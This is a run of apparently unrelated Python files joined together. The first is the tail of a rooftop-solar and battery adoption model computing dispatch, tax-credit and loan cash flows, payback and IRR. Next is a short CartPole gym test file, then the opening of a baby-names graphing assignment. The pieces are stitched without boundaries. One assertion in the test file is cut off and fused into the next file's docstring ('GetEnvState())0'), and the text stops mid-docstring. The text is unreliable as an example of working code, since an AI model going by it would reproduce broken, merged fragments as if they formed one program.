tFuncs.Export_Tariff(full_retail_nem=True) export_tariff.periods_8760 = tariff.e_tou_8760 export_tariff.prices = tariff.e_prices_no_tier else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) export_tariff.set_constant_sell_price(agent.loc['wholesale_elec_usd_per_kwh']) accurate_results = dFuncs.determine_optimal_dispatch(load_profile, opt_pv_size*pv_cf_profile, batt, tariff, export_tariff, estimated=False, d_inc_n=d_inc_n_acc, DP_inc=DP_inc_acc) else: export_tariff = tFuncs.Export_Tariff(full_retail_nem=False) export_tariff.set_constant_sell_price(0.) accurate_results = dFuncs.determine_optimal_dispatch(load_profile, opt_pv_size*pv_cf_profile, batt, tariff, export_tariff, estimated=False, d_inc_n=d_inc_n_acc, DP_inc=DP_inc_acc) # add system size class system_size_breaks = [0.0, 2.5, 5.0, 10.0, 20.0, 50.0, 100.0, 250.0, 500.0, 750.0, 1000.0, 1500.0, 3000.0] #=========================================================================# # Determine dispatch trajectory for chosen system size #=========================================================================# opt_bill = accurate_results['bill_under_dispatch'] #+ one_time_charge agent.loc['first_year_elec_bill_with_system'] = opt_bill * agent.loc['elec_price_multiplier'] agent.loc['first_year_elec_bill_savings'] = agent.loc['first_year_elec_bill_without_system'] - agent.loc['first_year_elec_bill_with_system'] agent.loc['first_year_elec_bill_savings_frac'] = agent.loc['first_year_elec_bill_savings'] / agent.loc['first_year_elec_bill_without_system'] opt_bill_savings = np.zeros([1, agent.loc['economic_lifetime'] + 1]) opt_bill_savings[:, 1:] = (original_bill - opt_bill) opt_bill_savings = opt_bill_savings * agent.loc['elec_price_multiplier'] * escalator * degradation # If the batt kW is less than 25% of the PV kW, apply the ITC if opt_pv_size >= opt_batt_power*4: batt_chg_frac = 1.0 else: batt_chg_frac = 0.0 cash_incentives = np.array([cash_incentives[index_of_best_fin_perform_ho]]) investment_incentives = np.array([investment_incentives[index_of_best_fin_perform_ho]]) capacity_based_incentives = np.array([capacity_based_incentives[index_of_best_fin_perform_ho]]) production_based_incentives = np.array(production_based_incentives[index_of_best_fin_perform_ho]) cf_results_opt = cashflow_constructor(bill_savings=opt_bill_savings, pv_size=opt_pv_size, pv_price=agent.loc['pv_price_per_kw'], pv_om=agent.loc['pv_om_per_kw'], batt_cap=opt_batt_cap, batt_power=opt_batt_power, batt_cost_per_kw=agent.loc['batt_price_per_kw'], batt_cost_per_kwh=agent.loc['batt_price_per_kwh'], batt_om_per_kw=agent['batt_om_per_kw'], batt_om_per_kwh=agent['batt_om_per_kwh'], batt_chg_frac=batt_chg_frac, sector=agent.loc['sector_abbr'], itc=agent.loc['itc_fraction'], deprec_sched=agent.loc['deprec_sch'], fed_tax_rate=agent.loc['tax_rate'], state_tax_rate=0, real_d=agent.loc['discount_rate'], analysis_years=agent.loc['economic_lifetime'], inflation=agent.loc['inflation'], down_payment_fraction=agent.loc['down_payment'], loan_rate=agent.loc['loan_rate'], loan_term=agent.loc['loan_term'], cash_incentives=cash_incentives, ibi=investment_incentives, cbi=capacity_based_incentives, pbi=production_based_incentives) #=========================================================================# # Package results #=========================================================================# agent['pv_kw'] = opt_pv_size agent['batt_kw'] = opt_batt_power agent['batt_kwh'] = opt_batt_cap agent['npv'] = cf_results_opt['npv'][0] agent['cash_flow'] = cf_results_opt['cf'][0] agent['batt_dispatch_profile'] = accurate_results['batt_dispatch_profile'] agent['bill_savings'] = opt_bill_savings agent['aep'] = agent['pv_kw'] * agent['naep'] agent['cf'] = agent['naep']/8760 agent['system_size_factors'] = np.where(agent['pv_kw'] == 0, 0, pd.cut([agent['pv_kw']], system_size_breaks))[0] agent['export_tariff_results'] = original_results out_cols = list(agent.index) new_cols = [i for i in out_cols if i not in in_cols] + ['agent_id'] agent = agent.loc[agent.index.isin(new_cols)] except Exception as e: logger.info(' ') logger.info('--------------------------------------------') logger.info("failed in calc_system_size_and_financial_performance") logger.info(('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e), e)) logger.info('agent that failed') logger.info(agent) logger.info('--------------------------------------------') agent.to_pickle('agent_that_failed.pkl') return agent #%% @decorators.fn_timer(logger = logger, tab_level = 2, prefix = '') def calc_financial_performance(dataframe): """ Function to calculate the payback period and join it on the agent dataframe. Parameters ---------- dataframe : pandas.DataFrame Agent dataframe Returns ------- pandas.DataFrame Agent dataframe with `payback_period` joined on dataframe """ # dataframe = dataframe.reset_index() cfs = np.vstack(dataframe['cash_flow']).astype(np.float) # calculate payback period tech_lifetime = np.shape(cfs)[1] - 1 payback = calc_payback_vectorized(cfs, tech_lifetime) # calculate time to double ttd = calc_ttd(cfs) metric_value = np.where(dataframe['sector_abbr']=='res', payback, ttd) dataframe['metric_value'] = metric_value dataframe = dataframe.set_index('agent_id') return dataframe #%% @decorators.fn_timer(logger = logger, tab_level = 2, prefix = '') def calc_max_market_share(dataframe, max_market_share_df): """ Calculates the maximum marketshare available for each agent. Parameters ---------- dataframe : pandas.DataFrame Attributes ---------- metric_value : float max_market_share_df : pandas.DataFrame Set by :meth:`settings.ScenarioSettings.get_max_marketshare`. Returns ------- pandas.DataFrame Input DataFrame with `max_market_share` and `metric` columns joined on. """ in_cols = list(dataframe.columns) dataframe = dataframe.reset_index() dataframe['business_model'] = 'host_owned' dataframe['metric'] = 'payback_period' # Convert metric value to integer as a primary key, then bound within max market share ranges max_payback = max_market_share_df[max_market_share_df.metric == 'payback_period'].metric_value.max() min_payback = max_market_share_df[max_market_share_df.metric == 'payback_period'].metric_value.min() max_mbs = max_market_share_df[max_market_share_df.metric == 'percent_monthly_bill_savings'].metric_value.max() min_mbs = max_market_share_df[max_market_share_df.metric == 'percent_monthly_bill_savings'].metric_value.min() # copy the metric valeus to a new column to store an edited version metric_value_bounded = dataframe['metric_value'].values.copy() # where the metric value exceeds the corresponding max market curve bounds, set the value to the corresponding bound metric_value_bounded[np.where((dataframe.metric == 'payback_period') & (dataframe['metric_value'] < min_payback))] = min_payback metric_value_bounded[np.where((dataframe.metric == 'payback_period') & (dataframe['metric_value'] > max_payback))] = max_payback metric_value_bounded[np.where((dataframe.metric == 'percent_monthly_bill_savings') & (dataframe['metric_value'] < min_mbs))] = min_mbs metric_value_bounded[np.where((dataframe.metric == 'percent_monthly_bill_savings') & (dataframe['metric_value'] > max_mbs))] = max_mbs dataframe['metric_value_bounded'] = metric_value_bounded # scale and round to nearest int dataframe['metric_value_as_factor'] = [int(round(i,1) * 100) for i in dataframe['metric_value_bounded']] # add a scaled key to the max_market_share dataframe too max_market_share_df['metric_value_as_factor'] = [int(round(float(i), 1) * 100) for i in max_market_share_df['metric_value']] # Join the max_market_share table and dataframe in order to select the ultimate mms based on the metric value. dataframe = pd.merge(dataframe, max_market_share_df[['sector_abbr', 'max_market_share','metric_value_as_factor', 'metric', 'business_model']], how = 'left', on = ['sector_abbr','metric_value_as_factor','metric', 'business_model']) # Derate the maximum market share for commercial and industrial customers in leased buildings by (2/3) # based on the owner occupancy status (1 = owner-occupied, 2 = leased) dataframe['max_market_share'] = np.where(dataframe['owner_occupancy_status'] == 2, dataframe['max_market_share']/3,dataframe['max_market_share']) # out_cols = in_cols + ['max_market_share', 'metric'] out_cols = in_cols + ['max_market_share', 'metric_value_as_factor', 'metric', 'metric_value_bounded'] return dataframe[out_cols] def calc_ttd(cfs): """ Calculate time to double investment based on the MIRR. This is used for the commercial and industrial sectors. Parameters ---------- cfs : numpy.ndarray Project cash flows ($/yr). Returns ------- ttd : numpy.ndarray Time to double investment (years). """ irrs = virr(cfs, precision = 0.005, rmin = 0, rmax1 = 0.3, rmax2 = 0.5) # suppress errors due to irrs of nan with np.errstate(invalid = 'ignore'): irrs = np.where(irrs<=0,1e-6,irrs) ttd = np.log(2) / np.log(1 + irrs) ttd[ttd <= 0] = 0 ttd[ttd > 30] = 30.1 # also deal with ttd of nan by setting to max payback period (this should only occur when cashflows = 0) if not np.all(np.isnan(ttd) == np.all(cfs == 0, axis = 1)): raise Exception("np.nan found in ttd for non-zero cashflows") ttd[np.isnan(ttd)] = 30.1 return ttd.round(decimals = 1) # must be rounded to nearest 0.1 to join with max_market_share #%% def cashflow_constructor(bill_savings, pv_size, pv_price, pv_om, batt_cap, batt_power, batt_cost_per_kw, batt_cost_per_kwh, batt_om_per_kw, batt_om_per_kwh, batt_chg_frac, sector, itc, deprec_sched, fed_tax_rate, state_tax_rate, real_d, analysis_years, inflation, down_payment_fraction, loan_rate, loan_term, cash_incentives=np.array([0]), ibi=np.array([0]), cbi=np.array([0]), pbi=np.array([[0]]), print_statements=False): """ Calculate the system cash flows based on the capex, opex, bill savings, incentives, tax implications, and other factors Parameters ---------- bill_savings : "numpy.ndarray" Annual bill savings ($/yr) from system adoption from 1st year through system lifetime pv_size : "numpy.float64" system capacity selected by agent (kW) pv_price : "float" system capex ($/kW) pv_om : "float" system operation and maintanence cost ($/kW) batt_cap : "numpy.float64" energy capacity of battery selected (kWh) batt_power : "numpy.float64" demand capacity of battery selected (kW) batt_cost_per_kw : "float" capex of battery per kW installed ($/kW) batt_cost_per_kwh : "float" capex of battery per kWh installed ($/kWh) batt_om_per_kw : "float" opex of battery per kW installed ($/kW-yr) batt_om_per_kwh : "float" opex of battery per kW installed ($/kWh-yr) batt_chg_frac : "int" fraction of the battery's energy that it gets from a co-hosted PV system. Used for ITC calculation. sector : "str" agent sector itc : "float" fraction of capex offset by federal investment tax credit deprec_sched : "list" fraction of capex eligible for tax-based depreciation fed_tax_rate : "float" average tax rate as fraction from federal taxes state_tax_rate : "int" average tax rate as fraction from state taxes real_d : "float" annua discount rate in real terms analysis_years : "int" number of years to use in economic analysis inflation : "float" annual average inflation rate as fraction e.g. 0.025 down_payment_fraction : "int" fraction of capex used as system down payment loan_rate_real : "float" real interest rate for debt payments loan_term : "int" number of years for loan term cash_incentives : "numpy.ndarray" array describing eligible cash-based incentives e.g. $ ibi : "numpy.ndarray" array describing eligible investment-based incentives e.g. 0.2 cbi : "numpy.ndarray" array describing eligible one-time capacity-based incentives e.g. $/kW pbi : "numpy.ndarray" array describing eligible ongoing performance-based incentives e.g $/kWh-yr Returns ------- cf : 'dtype Annual cash flows of project investment ($/yr) cf_discounted : 'dtype' Annual discounted cash flows of project investment ($/yr) npv : 'dtype' Net present value ($) of project investment using WACC bill_savings : 'dtype' Nominal cash flow of the annual bill savings over the lifetime of the system after_tax_bill_savings : 'dtype' Effective after-tax bill savings (electricity costs are tax-deductible for commercial entities) pv_cost : 'dtype' Capex of system in ($) batt_cost : 'dtype' Capex of battery in ($) installed_cost : 'dtype' Combined capex of system + battery up_front_cost : 'dtype Capex in 0th year as down payment batt_om_cf : 'dtype' Annual cashflows of battery opex operating_expenses : 'dtype' Combined annual opex of system + battery ($/yr) pv_itc_value : 'dtype' Absolute value of investment tax credit for system ($) batt_itc_value : 'dtype' Absolute value of investment tax credit for battery ($) itc_value : 'dtype' Absolute value of investment tax credit for combined system + battery ($) deprec_basis : 'dtype' Absolute value of depreciable basis of system ($) deprec_deductions : 'dtype' Annual amount of depreciable capital in given year ($) initial_debt : 'dtype' Amount of debt for loan ($) annual_principal_and_interest_payment : 'dtype' Annual amount of debt service payment, principal + interest ($) debt_balance : 'dtype' Annual amount of debt remaining in given year ($) interest_payments : 'dtype' Annual amount of interest payment in given year ($) principal_and_interest_payments : 'dtype' Array of annual principal and interest payments ($) total_taxable_income : 'dtype' Amount of stateincome from incentives eligible for taxes state_deductions : 'dtype' Reduction to state taxable income from interest, operating expenses, or bill savings depending on sector total_taxable_state_income_less_deductions : 'dtype' Total taxable state income less any applicable deductions state_income_taxes : 'dtype' Amount of state income tax i.e. net taxable income by tax rate fed_deductions : 'dtype' Reduction to federal taxable income from interest, operating expenses, or bill savings depending on sector total_taxable_fed_income_less_deductions : 'dtype' Total taxable federal income less any applicable deductions fed_income_taxes : 'dtype' Amount of federal income tax i.e. net taxable income by tax rate interest_payments_tax_savings : 'dtype' Amount of tax savings from deductions of interest payments operating_expenses_tax_savings : 'dtype' Amount of tax savings from deductions of operating expenses deprec_deductions_tax_savings : 'dtype' Amount of tax savings from deductions of capital depreciation elec_OM_deduction_decrease_tax_liability : 'dtype' Amount of tax savings from deductions of electricity costs as deductible business expense Todo ---- 1) Sales tax basis and rate 2) note that sales tax goes into depreciable basis 3) Propery taxes (res can deduct from income taxes, I think) 4) insurance 5) add pre-tax cash flow 6) add residential mortgage option 7) add carbon tax revenue 8) More exhaustive checking. I have confirmed basic formulations against SAM, but there are many permutations that haven't been checked. 9) make incentives reduce depreciable basis 10) add a flag for high incentive levels 11) battery price schedule, for replacements 12) improve inverter replacement 13) improve battery replacement 14) add inflation adjustment for replacement prices 15) improve deprec schedule handling 16) Make financing unique to each agent 17) Make battery replacements depreciation an input, with default of 7 year MACRS 18) Have a better way to deal with capacity vs effective capacity and battery costs 19) Make it so it can accept different loan terms """ #################### Massage inputs ######################################## # If given just a single value for an agent-specific variable, repeat that # variable for each agent. This assumes that the variable is intended to be # applied to each agent. if np.size(np.shape(bill_savings)) == 1: shape = (1, analysis_years + 1) else: shape = (np.shape(bill_savings)[0], analysis_years + 1) n_agents = shape[0] if np.size(sector) != n_agents or n_agents == 1: sector = np.repeat(sector, n_agents) if np.size(fed_tax_rate) != n_agents or n_agents == 1: fed_tax_rate = np.repeat(fed_tax_rate, n_agents) if np.size(state_tax_rate) != n_agents or n_agents == 1: state_tax_rate = np.repeat(state_tax_rate, n_agents) if np.size(itc) != n_agents or n_agents == 1: itc = np.repeat(itc, n_agents) if np.size(pv_size) != n_agents or n_agents == 1: pv_size = np.repeat(pv_size, n_agents) if np.size(pv_price) != n_agents or n_agents == 1: pv_price = np.repeat(pv_price, n_agents) if np.size(pv_om) != n_agents or n_agents == 1: pv_om = np.repeat(pv_om, n_agents) if np.size(batt_cap) != n_agents or n_agents == 1: batt_cap = np.repeat(batt_cap, n_agents) if np.size(batt_power) != n_agents or n_agents == 1: batt_power = np.repeat(batt_power, n_agents) if np.size(batt_cost_per_kw) != n_agents or n_agents == 1: batt_cost_per_kw = np.repeat(batt_cost_per_kw, n_agents) if np.size(batt_cost_per_kwh) != n_agents or n_agents == 1: batt_cost_per_kwh = np.repeat(batt_cost_per_kwh,n_agents) if np.size(batt_chg_frac) != n_agents or n_agents == 1: batt_chg_frac = np.repeat(batt_chg_frac, n_agents) if np.size(batt_om_per_kw) != n_agents or n_agents == 1: batt_om_per_kw = np.repeat(batt_om_per_kw, n_agents) if np.size(batt_om_per_kwh) != n_agents or n_agents == 1: batt_om_per_kwh = np.repeat(batt_om_per_kwh, n_agents) if np.size(real_d) != n_agents or n_agents == 1: real_d = np.repeat(real_d, n_agents) if np.size(down_payment_fraction) != n_agents or n_agents == 1: down_payment_fraction = np.repeat(down_payment_fraction, n_agents) if np.size(loan_rate) != n_agents or n_agents == 1: loan_rate = np.repeat(loan_rate, n_agents) if np.size(ibi) != n_agents or n_agents == 1: ibi = np.repeat(ibi, n_agents) if np.size(cbi) != n_agents or n_agents == 1: cbi = np.repeat(cbi, n_agents) if len(pbi) != n_agents: if len(pbi) > 0: pbi = np.tile(pbi[0], (n_agents, 1)) else: pbi = np.tile(np.array([0] * analysis_years), (n_agents, 1)) if np.array(deprec_sched).ndim == 1 or n_agents == 1: deprec_sched = np.array(deprec_sched) #################### Setup ######################################### effective_tax_rate = fed_tax_rate * (1 - state_tax_rate) + state_tax_rate if print_statements: logger.info('effective_tax_rate') logger.info(effective_tax_rate) logger.info(' ') cf = np.zeros(shape) inflation_adjustment = (1+inflation)**np.arange(analysis_years+1) #################### Bill Savings ######################################### # For C&I customers, bill savings are reduced by the effective tax rate, # assuming the cost of electricity could have otherwise been counted as an # O&M expense to reduce federal and state taxable income. bill_savings = bill_savings*inflation_adjustment # Adjust for inflation after_tax_bill_savings = np.zeros(shape) after_tax_bill_savings = (bill_savings.T * (1 - (sector!='res')*effective_tax_rate)).T # reduce value of savings because they could have otherwise be written off as operating expenses cf += bill_savings if print_statements: logger.info('bill savings cf') logger.info(np.sum(cf,1)) logger.info(' ') #################### Installed Costs ###################################### # Assumes that cash incentives, IBIs, and CBIs will be monetized in year 0, # reducing the up front installed cost that determines debt levels. pv_cost = pv_size*pv_price # assume pv_price includes initial inverter purchase batt_cost = batt_power*batt_cost_per_kw + batt_cap*batt_cost_per_kwh installed_cost = pv_cost + batt_cost if print_statements: logger.info('installed_cost') logger.info(pv_cost) logger.info(' ') net_installed_cost = installed_cost - (installed_cost * ibi) -cash_incentives - cbi wacc = (((down_payment_fraction * net_installed_cost) / net_installed_cost) * real_d) + ((((1-down_payment_fraction) * net_installed_cost) / net_installed_cost) * loan_rate) up_front_cost = net_installed_cost * down_payment_fraction if print_statements: logger.info('wacc') logger.info(wacc) logger.info(' ') cf[:,0] -= net_installed_cost #all installation costs upfront for WACC if print_statements: logger.info('bill savings minus up front cost') logger.info(np.sum(cf,1)) logger.info(' ') #################### Operating Expenses ################################### # Nominally includes O&M, replacement costs, fuel, insurance, and property # tax - although currently only includes O&M and replacements. # All operating expenses increase with inflation operating_expenses_cf = np.zeros(shape) batt_om_cf = np.zeros(shape) # Battery O&M (replacement costs added to base O&M when costs were ingested) batt_om_cf[:,1:] = (batt_power*batt_om_per_kw + batt_cap*batt_om_per_kwh).reshape(n_agents, 1) # PV O&M operating_expenses_cf[:,1:] = (pv_om * pv_size).reshape(n_agents, 1) operating_expenses_cf += batt_om_cf operating_expenses_cf = operating_expenses_cf*inflation_adjustment cf -= operating_expenses_cf if print_statements: logger.info('minus operating expenses') logger.info(cf) logger.info(' ') #################### Federal ITC ######################################### pv_itc_value = pv_cost * itc batt_itc_value = batt_cost * itc * batt_chg_frac * (batt_chg_frac>=0.75) itc_value = pv_itc_value + batt_itc_value # itc value added in fed_tax_savings_or_liability if print_statements: logger.info('itc value') logger.info(itc_value) logger.info(' ') #################### Depreciation ######################################### # Per SAM, depreciable basis is sum of total installed cost and total # construction financing costs, less 50% of ITC and any incentives that # reduce the depreciable basis. deprec_deductions = np.zeros(shape) deprec_basis = installed_cost - itc_value * 0.5 deprec_deductions[:, 1: np.size(deprec_sched) + 1] = np.array([x * deprec_sched.T for x in deprec_basis]) # to be used later in fed tax calcs if print_statements: logger.info('deprec_deductions') logger.info(deprec_deductions) logger.info(' ') #################### Debt cash flow ####################################### # Deduct loan interest payments from state & federal income taxes for res # mortgage and C&I. No deduction for res loan. # note that the debt balance in year0 is different from principal if there # are any ibi or cbi. Not included here yet. # debt balance, interest payment, principal payment, total payment initial_debt = net_installed_cost - up_front_cost if print_statements: logger.info('initial_debt') logger.info(initial_debt) logger.info(' ') annual_principal_and_interest_payment = initial_debt * (loan_rate*(1+loan_rate)**loan_term) / ((1+loan_rate)**loan_term - 1) if print_statements: logger.info('annual_principal_and_interest_payment') logger.info(annual_principal_and_interest_payment) logger.info(' ') debt_balance = np.zeros(shape) interest_payments = np.zeros(shape) principal_and_interest_payments = np.zeros(shape) debt_balance[:,:loan_term] = (initial_debt*((1+loan_rate.reshape(n_agents,1))**np.arange(loan_term)).T).T - (annual_principal_and_interest_payment*(((1+loan_rate).reshape(n_agents,1)**np.arange(loan_term) - 1.0)/loan_rate.reshape(n_agents,1)).T).T interest_payments[:,1:] = (debt_balance[:,:-1].T * loan_rate).T if print_statements: logger.info('interest_payments') logger.info(interest_payments) logger.info(' ') logger.info('sum of interst_payments') logger.info(np.sum(interest_payments)) logger.info(' ') logger.info('net_installed_cost') logger.info(net_installed_cost) logger.info(' ') logger.info('sum of net_installed_cost and interest payments') logger.info(net_installed_cost + np.sum(interest_payments)) logger.info(' ') principal_and_interest_payments[:,1:loan_term+1] = annual_principal_and_interest_payment.reshape(n_agents, 1) if print_statements: logger.info('principal_and_interest_payments') logger.info(principal_and_interest_payments) logger.info(' ') logger.info('sum of principal and interest payments, and upfront cost') logger.info(np.sum(principal_and_interest_payments) + up_front_cost) logger.info(' ') logger.info('cf minus intrest payments') logger.info(np.sum(cf,1)) logger.info(' ') #################### State Income Tax ######################################### # Per SAM, taxable income is CBIs and PBIs (but not IBIs) # Assumes no state depreciation # Assumes that revenue from DG is not taxable income # total_taxable_income = np.zeros(shape) # total_taxable_income[:,1] = cbi # total_taxable_income[:,:np.shape(pbi)[1]] += pbi total_taxable_income = np.zeros(shape) total_taxable_income[:, 1] = cbi total_taxable_income[:, 1:] += pbi state_deductions = np.zeros(shape) state_deductions += (interest_payments.T * (sector!='res')).T state_deductions += (operating_expenses_cf.T * (sector!='res')).T state_deductions -= (bill_savings.T * (sector!='res')).T total_taxable_state_income_less_deductions = total_taxable_income - state_deductions state_income_taxes = (total_taxable_state_income_less_deductions.T * state_tax_rate).T state_tax_savings_or_liability = -state_income_taxes if print_statements: logger.info('state_tax_savings') logger.info(state_tax_savings_or_liability) cf += state_tax_savings_or_liability ################## Federal Income Tax ######################################### # Assumes all deductions are federal fed_deductions = np.zeros(shape) fed_deductions += (interest_payments.T * (sector!='res')).T fed_deductions += (deprec_deductions.T * (sector!='res')).T fed_deductions += state_income_taxes fed_deductions += (operating_expenses_cf.T * (sector!='res')).T fed_deductions -= (bill_savings.T * (sector!='res')).T total_taxable_fed_income_less_deductions = total_taxable_income - fed_deductions fed_income_taxes = (total_taxable_fed_income_less_deductions.T * fed_tax_rate).T fed_tax_savings_or_liability_less_itc = -fed_income_taxes if print_statements: logger.info('federal_tax_savings') logger.info(fed_tax_savings_or_liability_less_itc) cf += fed_tax_savings_or_liability_less_itc cf[:,1] += itc_value ######################## Packaging tax outputs ############################ # interest_payments_tax_savings = (interest_payments.T * effective_tax_rate).T operating_expenses_tax_savings = (operating_expenses_cf.T * effective_tax_rate).T deprec_deductions_tax_savings = (deprec_deductions.T * fed_tax_rate).T elec_OM_deduction_decrease_tax_liability = (bill_savings.T * effective_tax_rate).T ########################### Post Processing ############################### powers = np.zeros(shape, int) powers[:,:] = np.array(list(range(analysis_years+1))) discounts = np.zeros(shape, float) discounts[:,:] = (1/(1+wacc)).reshape(n_agents, 1) if print_statements: logger.info('discounts') logger.info(np.mean(discounts,1)) logger.info(' ') cf_discounted = cf * np.power(discounts, powers) cf_discounted = np.nan_to_num(cf_discounted) if print_statements: logger.info('cf not discounted') logger.info(cf) logger.info(' ') if print_statements: logger.info('cf_discounted') logger.info(cf_discounted) logger.info(' ') npv = np.sum(cf_discounted, 1) if print_statements: logger.info('npv') logger.info(npv) logger.info(' ') ########################### Package Results ############################### results = {'cf':cf, 'cf_discounted':cf_discounted, 'npv':npv, 'bill_savings':bill_savings, 'after_tax_bill_savings':after_tax_bill_savings, 'pv_cost':pv_cost, 'batt_cost':batt_cost, 'installed_cost':installed_cost, 'up_front_cost':up_front_cost, 'batt_om_cf':batt_om_cf, 'operating_expenses':operating_expenses_cf, 'pv_itc_value':pv_itc_value, 'batt_itc_value':batt_itc_value, 'itc_value':itc_value, 'deprec_basis':deprec_basis, 'deprec_deductions':deprec_deductions, 'initial_debt':initial_debt, 'annual_principal_and_interest_payment':annual_principal_and_interest_payment, 'debt_balance':debt_balance, 'interest_payments':interest_payments, 'principal_and_interest_payments':principal_and_interest_payments, 'total_taxable_income':total_taxable_income, 'state_deductions':state_deductions, 'total_taxable_state_income_less_deductions':total_taxable_state_income_less_deductions, 'state_income_taxes':state_income_taxes, 'fed_deductions':fed_deductions, 'total_taxable_fed_income_less_deductions':total_taxable_fed_income_less_deductions, 'fed_income_taxes':fed_income_taxes, # 'interest_payments_tax_savings':interest_payments_tax_savings, 'operating_expenses_tax_savings':operating_expenses_tax_savings, 'deprec_deductions_tax_savings':deprec_deductions_tax_savings, 'elec_OM_deduction_decrease_tax_liability':elec_OM_deduction_decrease_tax_liability} return results #============================================================================== def calc_payback_vectorized(cfs, tech_lifetime): """ Payback calculator. Can be either simple payback or discounted payback, depending on whether the input cash flow is discounted. Parameters ---------- cfs : numpy.ndarray Project cash flows ($/yr). tech_lifetime : int Lifetime of technology used for project. Returns ------- pp : numpy.ndarray Interpolated payback period (years) """ years = np.array([np.arange(0, tech_lifetime)] * cfs.shape[0]) cum_cfs = cfs.cumsum(axis = 1) no_payback = np.logical_or(cum_cfs[:, -1] <= 0, np.all(cum_cfs <= 0, axis = 1)) instant_payback = np.all(cum_cfs > 0, axis = 1) neg_to_pos_years = np.diff(np.sign(cum_cfs)) > 0 base_years = np.amax(np.where(neg_to_pos_years, years, -1), axis = 1) # replace values of -1 with 30 base_years_fix = np.where(base_years == -1, tech_lifetime - 1, base_years) base_year_mask = years == base_years_fix[:, np.newaxis] # base year values base_year_values = cum_cfs[:, :-1][base_year_mask] next_year_values = cum_cfs[:, 1:][base_year_mask] frac_years = base_year_values/(base_year_values - next_year_values) pp_year = base_years_fix + frac_years pp_precise = np.where(no_payback, tech_lifetime, np.where(instant_payback, 0, pp_year)) pp_final = np.array(pp_precise).round(decimals = 3) return pp_final #%% def virr(cfs, precision = 0.005, rmin = 0, rmax1 = 0.3, rmax2 = 0.5): """ Vectorized IRR calculator. First calculate a 3D array of the discounted cash flows along cash flow series, time period, and discount rate. Sum over time to collapse to a 2D array which gives the NPV along a range of discount rates for each cash flow series. Next, find crossover where NPV is zero--corresponds to the lowest real IRR value. Parameters ---------- cfs : numpy.ndarray Rows are cash flow series, cols are time periods precision : float Level of accuracy for the inner IRR band, default value 0.005% rmin : float Lower bound of the inner IRR band default value 0% rmax1 : float Upper bound of the inner IRR band default value 30% rmax2 : float upper bound of the outer IRR band. e.g. 50% Values in the outer band are calculated to 1% precision, IRRs outside the upper band return the rmax2 value. Returns ------- numpy.ndarray IRRs for cash flow series Notes ----- For performance, negative IRRs are not calculated, returns "-1" and values are only calculated to an acceptable precision. """ if cfs.ndim == 1: cfs = cfs.reshape(1,len(cfs)) # Range of time periods years = np.arange(0,cfs.shape[1]) # Range of the discount rates rates_length1 = int((rmax1 - rmin)/precision) + 1 rates_length2 = int((rmax2 - rmax1)/0.01) rates = np.zeros((rates_length1 + rates_length2,)) rates[:rates_length1] = np.linspace(0,0.3,rates_length1) rates[rates_length1:] = np.linspace(0.31,0.5,rates_length2) # Discount rate multiplier rows are years, cols are rates drm = (1+rates)**-years[:,np.newaxis] # Calculate discounted cfs discounted_cfs = cfs[:,:,np.newaxis] * drm # Calculate NPV array by summing over discounted cashflows npv = discounted_cfs.sum(axis = 1) # Convert npv into boolean for positives (0) and negatives (1) signs = npv < 0 # Find the pairwise differences in boolean values # sign crosses over, the pairwise diff will be True crossovers = np.diff(signs,1,1) # Extract the irr from the first crossover for each row irr = np.min(np.ma.masked_equal(rates[1:]* crossovers,0),1) # deal with negative irrs negative_irrs = cfs.sum(1) < 0 r = np.where(negative_irrs,-1,irr) # where the implied irr exceeds 0.5, simply cap it at 0.5 r = np.where(irr.mask * (negative_irrs == False), 0.5, r) # where cashflows are all zero, set irr to nan r = np.where(np.all(cfs == 0, axis = 1), np.nan, r) return r pythonSimulatorsTests.py import pythonSimulators as pySims import gym import numpy as np import multiprocessing as mp #####Test 0: try to sample from StateSampler and check if the dimension is correct print("Start Test 0: sample from StateSampler") gymEnv = gym.make("CartPole-v0") gymEnv.reset() stateSampler = pySims.GymResetSampler(gymEnv) print(stateSampler.sample(10)) assert stateSampler.sample(10).shape == (10,4) print("Test 0 is OK") #####Test 1: try to reset the state0 from given state0 print("Start Test 1: ResetFromState0") gymEnv = gym.make("CartPole-v0") gymEnv.reset() state0 = np.array([0,1,-0.2,0.5]) sim=pySims.GymSimulator(gymEnv) sim.ResetFromS0(state0) eps=1e-17 assert ( np.linalg.norm(state0-sim.GetEnvState())0 """ SC101 Baby Names Project Adapted from 's Baby Names assignment by . YOUR DESCRIPTION HERE """ import tkinter import babynames import babygraphicsgui as gui from campy.gui.events.timer import pause FILENAMES = [ 'data/full/baby-1900.txt', 'data/full/baby-1910.txt', 'data/full/baby-1920.txt', 'data/full/baby-1930.txt', 'data/full/baby-1940.txt', 'data/full/baby-1950.txt', 'data/full/baby-1960.txt', 'data/full/baby-1970.txt', 'data/full/baby-1980.txt', 'data/full/baby-1990.txt', 'data/full/baby-2000.txt', 'data/full/baby-2010.txt' ] CANVAS_WIDTH = 1000 CANVAS_HEIGHT = 600 YEARS = [1900, 1910, 1920, 1930, 1940, 1950, 1960, 1970, 1980, 1990, 2000, 2010] GRAPH_MARGIN_SIZE = 20 COLORS = ['red', 'purple', 'green', 'blue'] TEXT_DX = 2 LINE_WIDTH = 2 MAX_RANK = 1000 DELAY = 20 def get_x_coordinate(width, year_index): """ Given the width of the canvas and the index of the current year in the YEARS list, returns the x coordinate of the vertical line associated with that year. Input: width (int): The width of the canvas year_index (int): The index of the current year in the YEARS list Returns: x_coordinate (int): The x coordinate of the vertical line associated with the specified year. """ year_space = (width-GRAPH_MARGIN_SIZE)//len(YEARS) x_coordinate = GRAPH_MARGIN_SIZE+int(year_index)*year_space return x_coordinate def draw_fixed_lines(canvas): """ Erases all existing information on the given canvas and then draws the fixed background lines on it. Input: canvas (Tkinter Canvas): The canvas on which we are drawing. Returns: This function does not return any value. """ canvas.delete('all') # delete all existing lines from the canvas # Write your code below this line canvas.create_line(GRAPH_MARGIN_SIZE, GRAPH_MARGIN_SIZE, CANVAS_WIDTH-GRAPH_MARGIN_SIZE, GRAPH_MARGIN_SIZE) canvas.create_line(GRAPH_MARGIN_SIZE, CANVAS_HEIGHT-GRAPH_MARGIN_SIZE, CANVAS_WIDTH-GRAPH_MARGIN_SIZE, CANVAS_HEIGHT-GRAPH_MARGIN_SIZE) for year in range(len(YEARS)): x = get_x_coordinate(CANVAS_WIDTH, year) canvas.create_line(x, 0, x, CANVAS_HEIGHT) canvas.create_text(x+TEXT_DX, CANVAS_HEIGHT-GRAPH_MARGIN_SIZE, text=YEARS[year], font='roboto 12', anchor=tkinter.NW) ################################# def draw_names(canvas, name_data, lookup_names): """ Given a 